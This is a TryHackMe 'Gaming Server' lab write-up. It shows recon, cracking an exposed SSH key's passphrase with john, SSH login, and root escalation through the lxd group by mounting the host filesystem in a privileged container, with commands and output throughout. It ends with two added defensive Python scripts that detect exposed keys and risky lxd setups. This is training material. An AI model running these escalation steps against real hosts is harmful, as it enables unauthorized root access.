[TryHackMe] Gaming Server (sensitive information disclosure, privilege escalation via the lxd group)


Published 13 minutes ago
┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.10.77.110    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 06:09 EDT
Nmap scan report for 10.10.77.110
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.63 seconds
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 -u http://10.10.78.156

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-26_22-15-41.log

Target: http://10.10.78.156

[22:15:41] Starting: 
[22:15:43] 200 -    3KB - /
[22:15:45] 301 -  314B  - /uploads  ->  http://10.10.78.156/uploads/
[22:16:05] 301 -  313B  - /secret  ->  http://10.10.78.156/secret/
[22:21:29] 403 -  277B  - /server-status      

On the /uploads/ page we find a wordlist file, dict.lst

Download it: wget http://10.10.77.110/uploads/dict.lst

In /secret/ we find an SSH private key file

Download it locally for later use: wget http://10.10.77.110/secret/secretKey

Crack the passphrase of the private key above with john

┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# locate ssh2john.py
/usr/share/john/ssh2john.py
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# /usr/share/john/ssh2john.py secretKey >crack
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# cat crack    
secretKey:$sshng$1$16$82823EE792E75948EE2DE731AF1A0547$1200$4fbf85fb78a59b915c159c76e269ebba0318e39e6f238eb5ce231be0d624f58255e6ec1caf1e107e53f6436564f298711f83fe3cb6fbf6709cd12ac138f065074577a632c96dfda129b65acc52edab816366aeba68b2c8af6751c3be0ccc748c1739c523b8ecc581703d4a99b64cf9b13717d5a7dc87e214e7f21de334d3b023bcaaab3aaafe5090c5d51acefb1769122da7f1d2625d72ebbfe5a477363355b65b8a672897227b245e20b4d7e627864aa3978232edf1339f6a999ca28f54fbfcf739440a31114b2b1b50a61c7271649c1d43c2e244c43fdeac64622c160e1ae31ab5cf84a1a80a906a52666e05b5c20e22bc317b20a1237daf26cf56f773d4a8732008919712963bfc834c5106a10dfdf09e5561042d745161fda6220eba934d4a48d26eb2313a058984872913d04b5541389dd00c8b7b74e4c635534928effbef8739dd79971685527749d708031e20ff90ff62a70bb6dfed29b2f2bb2820936dcdceeb299db530656a28e5fbe0fa312046e77dd2ce1d0d630451119d0765adc3bb982458638a3c3cb70f16c1a3c71d0798b4782bb708660bf80b8f583102ae77d900209971a86b35dddc878546d181ebe1cb0e5f15443cf5ff889985a7c30b682284a7963a398b87cdd0a8ac1ae2cd57201e8128f652fce83233844c9cddee666bf5ac33cbfb4cb3b7a03904710d5df90d7c5591590c6f2ad8869522e6cb03cfe4e1e7bf49b36f5e901b412cd453e5c615721edfd62a569565f4ddac99de4e7f14bb7bd9f363057fe7af6dd30f64cc7d5dcdc8c7bfe115e23109da0c3788baf01a1915005ca0968eb9f9cb9130b4847c4ded3fedfd0bdc688b1648559d830c276056899dc1de123eddd619e6b008a26fbf437f2dfce3f9678d932d5f5357204821cd08f981af131671def2e983371e42ab91a960dd4152d7d6158aad906727bf32d224cd3b44082a03e48f018f250a75def2037e36fffdfbffbfba279f785b4e9aba435369117ebf49859631f5390bc13a8e3f45d68eab9f58d1085d7229c1715cb6965a110702e342e96c11930e25564d0cb1f00b88e9839f22dfa4eb87c6aed7e358f56fdf218e2668aa40e6bcfe90c682d34f827266145ac1cb6777ecacd2a0da5395799e4ff76b91e4da3fa616453cfc21e83e7e656db2041e959438e26872d2f138f28f762b18f7b8007a8d9a7c8f18000a970d06dde2b20ec7fddabaa18893b4226b2f721cb53ac4b815bc804dfb51b491a93ba3f45a32fb29c698d3f1e4741e0b968efc6a1e487d057a54e47102a20c3c47abb98b3096493b4a2a7497ece89b7f24ee20cdd061dc9b74801a0a9d731563b3f9bbc75aff8b15fa4244f7dc7b0e1f185e78f502
cda063e30c40756ebc2a67c1147b5cb98af058f74d953e5872b93fa5b97cb2bbbb7315b757aa1337f6ea58216e71149f5eca2aef9543a11d20f2f5e741d292ce55fb67c2f094d0d5f977ac8f6fa303cfb82f1a363f9042ee66eb903952b9abf18d35fd68ea9f6c02eeea71cedea134120c6dc36b9dd66483cd1f78a67c443ef013b131965da1bf748130c093e59ac116ae7889ad28853850f219253ea62175279b910b54e473d887e10bfef5352fd3df1afd338a9b2d81b2c53923e9f869a49674698a1697686617b2829f5ef03118254885b6962c0a790326c88971f2056b1b85b49130af8f
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# john crack --wordlist=/root/tryhackme/GamingServer/dict.lst
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (secretKey)
1g 0:00:00:00 DONE (2021-09-26 06:26) 100.0g/s 22200p/s 22200c/s 22200C/s 2003..starwars
Session completed

The passphrase is: letmein

What is the username?

In the source of the home page we see the following comment:

john, please add some actual content to the site! lorem ipsum is horrible to look at.

So john is a developer; we use john as the username and letmein as the key passphrase to log in over SSH
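The two files that made this box fall were both sitting in the web root: a private key whose passphrase was weak, and the very wordlist that cracks it. The following Python script is an added example, not part of the original write-up or of TryHackMe's material; it walks a document root, reports every private key it finds, and says whether the key is passphrase-protected at all (legacy PEM via the Proc-Type header, PKCS#8 via the ENCRYPTED envelope, openssh-key-v1 by reading the cipher name from the binary blob). The sample web root, the file names it flags and the DEK-Info IV are all constructed for the demonstration.

```python
"""Added example, not part of the original write-up: walk a web document
root looking for exposed SSH private keys (and wordlist-like files), and
report whether each key is passphrase-protected.  The sample web root is
constructed inline so the script runs offline."""
import base64
import os
import re
import struct
import tempfile

# PEM armour of every private-key flavour OpenSSH/OpenSSL can emit
KEY_HEADER = re.compile(rb"-----BEGIN ([A-Z ]*?)PRIVATE KEY-----")
# File names that should never sit under a web root (assumed heuristic list)
SUSPICIOUS_NAME = re.compile(r"(^id_(rsa|dsa|ecdsa|ed25519)$|\.(pem|key|lst|dic)$)", re.I)


def _read_string(buf: bytes, offset: int):
    """Read one SSH wire-format string: 4-byte big-endian length, then bytes."""
    (length,) = struct.unpack(">I", buf[offset:offset + 4])
    return buf[offset + 4:offset + 4 + length], offset + 4 + length


def classify_private_key(data: bytes):
    """None if data is not a private key, else 'encrypted', 'plaintext' or 'unknown'."""
    match = KEY_HEADER.search(data)
    if not match:
        return None
    label = match.group(1).strip()
    if label == b"ENCRYPTED":                 # PKCS#8 encrypted envelope
        return "encrypted"
    if label == b"OPENSSH":                   # openssh-key-v1 binary blob
        body = re.sub(rb"-----[^-]+-----", b"", data)
        raw = base64.b64decode(b"".join(body.split()))
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return "unknown"
        cipher, _ = _read_string(raw, len(magic))   # first field is ciphername
        return "plaintext" if cipher == b"none" else "encrypted"
    # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header
    return "encrypted" if b"Proc-Type: 4,ENCRYPTED" in data else "plaintext"


def scan_web_root(root: str) -> dict:
    """Map relative path -> finding for every file that should not be served."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read(1 << 16)       # 64 KiB is plenty for a key header
            kind = classify_private_key(data)
            if kind:
                findings[rel] = "private-key-" + kind
            elif SUSPICIOUS_NAME.search(name):
                findings[rel] = "suspicious-name"
    return findings


def _openssh_blob(cipher: bytes) -> bytes:
    """Constructed openssh-key-v1 armour carrying only the fields we parse."""
    raw = b"openssh-key-v1\x00"
    kdf = b"none" if cipher == b"none" else b"bcrypt"
    for field in (cipher, kdf, b""):          # ciphername, kdfname, kdfoptions
        raw += struct.pack(">I", len(field)) + field
    raw += struct.pack(">I", 1)               # number of keys (rest omitted)
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.encodebytes(raw)
            + b"-----END OPENSSH PRIVATE KEY-----\n")


def build_sample_webroot() -> str:
    """Create a constructed web root mirroring the write-up's layout."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.html": b"<html><!-- john, please add some content --></html>\n",
        "uploads/dict.lst": b"letmein\npassword\nstarwars\n",
        # Legacy PEM key protected by a passphrase (the IV value is constructed)
        "secret/secretKey": (b"-----BEGIN RSA PRIVATE KEY-----\n"
                             b"Proc-Type: 4,ENCRYPTED\n"
                             b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                             b"QUJDREVG\n-----END RSA PRIVATE KEY-----\n"),
        # New-format key with cipher 'none': no passphrase at all
        "backup/id_ed25519": _openssh_blob(b"none"),
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, finding in sorted(scan_web_root(build_sample_webroot()).items()):
        print(f"{finding:24} {rel}")
```

Pointing `scan_web_root()` at a real document root (for example /var/www/html) is the intended use; an "encrypted" result only means a passphrase exists, and as this box shows, a passphrase drawn from a wordlist that is served next to the key offers no protection.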

┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep 27 02:31:31 UTC 2021

  System load:  0.01              Processes:           98
  Usage of /:   41.4% of 9.78GB   Users logged in:     0
  Memory usage: 20%               IP address for eth0: 10.10.78.156
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Sep 27 02:31:18 2021 from 10.13.21.169
john@exploitable:~$ pwd
/home/john
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt
a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e

We have user.txt

Upload LinPEAS; it reports that lxd can be used for privilege escalation

What is lxd?

LXD focuses on system containers, also called infrastructure containers. That is, an LXD container runs a complete Linux system, almost exactly as it would run on a physical machine or a virtual machine. These containers are based on a clean distribution image and are long-running. Traditional configuration-management and deployment tools can be used with LXD containers just as you would use them with virtual machines, cloud instances or physical machines.

How lxd is used to escalate privileges

See the article LinPEAS points to

First, on the attacking machine, we clone the builder and build a container image file

# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

Then start an HTTP server with python and transfer the image file to the target

john@exploitable:/tmp$ wget http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz
--2021-09-27 03:57:58--  http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz
Connecting to 10.13.21.169:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2684439 (2.6M) [application/gzip]
Saving to: ‘alpine-v3.8-i686-20210926_2341.tar.gz’

alpine-v3.8-i686-20210926_2341.tar.gz                      100%[========================================================================================================================================>]   2.56M   624KB/s    in 4.2s    

2021-09-27 03:58:03 (624 KB/s) - ‘alpine-v3.8-i686-20210926_2341.tar.gz’ saved [2684439/2684439]

Create a container and mount the target's root filesystem at /mnt/root inside it

john@exploitable:/tmp$ lxc image import ./alpine-v3.8-i686-20210926_2341.tar.gz --alias myimage
Image imported with fingerprint: a4b76201ae71d9a5e56acf1263f61546a77a4086779729bb254d47cd24cb6829
john@exploitable:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
john@exploitable:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

Enter the container; the target's filesystem is now reachable under /mnt/root inside the container

john@exploitable:/tmp$ lxc start ignite
john@exploitable:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/
/mnt/root # ls
bin             cdrom           etc             initrd.img      lib             lost+found      mnt             proc            run             snap            swap.img        tmp             var             vmlinuz.old
boot            dev             home            initrd.img.old  lib64           media           opt             root            sbin            srv             sys             usr             vmlinuz
/mnt/root # cd root/
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt 
2e337b8c9f3aff0c2b3e8d4e6a7c88fc
/mnt/root/root # 
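The escalation above needs exactly two things on the host: a non-root user in the lxd group, and the ability to launch a privileged container with the host's / attached as a disk device. The LXD documentation itself treats lxd group membership as root-equivalent, so the defensive check is to enumerate both conditions. The following Python script is an added example, not part of the original write-up or of the LXD project; it reads /etc/group-style text for lxd members and inspects `lxc list --format json` output for instances that are privileged or expose host paths. The field names (`expanded_config`, `expanded_devices`, `security.privileged`, disk devices with `source`) follow the LXD API as I know it; the sample group file and instance list are constructed to mirror the end state of this box.

```python
"""Added example, not part of the original write-up: audit a host for the two
conditions the lxd escalation relies on -- non-root users in the lxd group,
and containers that are privileged and/or mount host paths.  Sample inputs
are constructed inline; live collection at the bottom is best effort."""
import json
import subprocess


def lxd_group_members(group_text: str) -> list:
    """Return the member list of the 'lxd' line in /etc/group-style text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "lxd":
            return [user for user in fields[3].split(",") if user]
    return []


def risky_instances(lxc_list_json: str) -> list:
    """Flag instances from `lxc list --format json` that run privileged or
    attach host paths through disk devices (field names as in the LXD API)."""
    risky = []
    for inst in json.loads(lxc_list_json):
        config = inst.get("expanded_config") or inst.get("config") or {}
        devices = inst.get("expanded_devices") or inst.get("devices") or {}
        privileged = str(config.get("security.privileged", "false")).lower() == "true"
        disks = {n: d for n, d in devices.items() if d.get("type") == "disk"}
        # source=/ hands the whole host filesystem to the container
        root_mounts = sorted(n for n, d in disks.items() if d.get("source") == "/")
        # any other absolute source is still a host path worth reviewing
        other_host_paths = sorted(n for n, d in disks.items()
                                  if str(d.get("source", "")).startswith("/")
                                  and d.get("source") != "/")
        if privileged or root_mounts:
            risky.append({"name": inst.get("name"), "privileged": privileged,
                          "host_root_mounts": root_mounts,
                          "other_host_paths": other_host_paths})
    return risky


def audit(group_text: str, lxc_list_json: str) -> dict:
    """Combine both checks into one report dictionary."""
    return {"lxd_members": lxd_group_members(group_text),
            "risky": risky_instances(lxc_list_json)}


# Constructed samples mirroring the write-up's end state: john in the lxd
# group, and the 'ignite' container privileged with host / at /mnt/root.
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:\nlxd:x:108:john\n"
SAMPLE_LXC_LIST = json.dumps([
    {"name": "ignite",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "root": {"type": "disk", "path": "/", "pool": "default"},
         "mydevice": {"type": "disk", "source": "/", "path": "/mnt/root",
                      "recursive": "true"}}},
    {"name": "web01",
     "expanded_config": {"security.privileged": "false"},
     "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
])


def collect_live():
    """Best-effort live collection; assumes `getent` and `lxc` are on PATH."""
    group_text = subprocess.run(["getent", "group", "lxd"], capture_output=True,
                                text=True, check=False).stdout
    lxc_json = subprocess.run(["lxc", "list", "--format", "json"], capture_output=True,
                              text=True, check=False).stdout or "[]"
    return group_text, lxc_json


if __name__ == "__main__":
    try:
        report = audit(*collect_live())
    except (OSError, ValueError):      # lxc absent, or it did not return JSON
        report = audit(SAMPLE_GROUP, SAMPLE_LXC_LIST)
    print(json.dumps(report, indent=2))
```

On a real host the remediation that follows from a non-empty `lxd_members` list is to remove accounts that are not trusted with root from the group (`gpasswd -d <user> lxd`), and to treat any instance reported with `host_root_mounts` as a root-level access path that needs an owner and a justification.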
